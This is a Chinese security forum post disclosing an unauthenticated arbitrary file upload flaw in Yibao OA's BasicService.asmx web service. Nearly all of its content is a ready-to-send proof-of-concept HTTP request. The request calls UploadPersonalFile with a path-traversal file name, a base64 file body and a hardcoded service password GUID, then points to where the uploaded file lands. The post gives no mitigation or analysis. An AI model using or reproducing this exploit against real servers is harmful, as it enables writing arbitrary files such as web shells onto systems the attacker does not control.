易宝OA 存在BasicService存在任意文件上传漏洞-网络安全论坛-网络安全-阻击者联盟

易宝OA 存在BasicService存在任意文件上传漏洞

勾八徽章-原创达人-阻击者联盟等级-LV2-阻击者联盟8个月前发布
680

易宝OA 存在BasicService.asmx接口缺少鉴权,存在任意文件上传漏洞

41d13b187b75621ada4035a93be1cd44

 

POC:

POST /WebService/BasicService.asmx  HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Content-Type: text/xml; charset=utf-8
Content-Length: 501

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <UploadPersonalFile xmlns="http://tempuri.org/">
      <fs>MTIzNA==</fs>
      <FileName>../../manager/2.txt</FileName>
      <webservicePassword>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}</webservicePassword>
    </UploadPersonalFile>
  </soap:Body>
</soap:Envelope>

2cf3663d7cf27039ccfbba280859d592

 文件地址:url+2.txt

3eb366792d9d14d2be01e074aba549c8

 

1
1人已评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布文章发布帖子
扫码添加微信-阻击者联盟
在手机上浏览此页面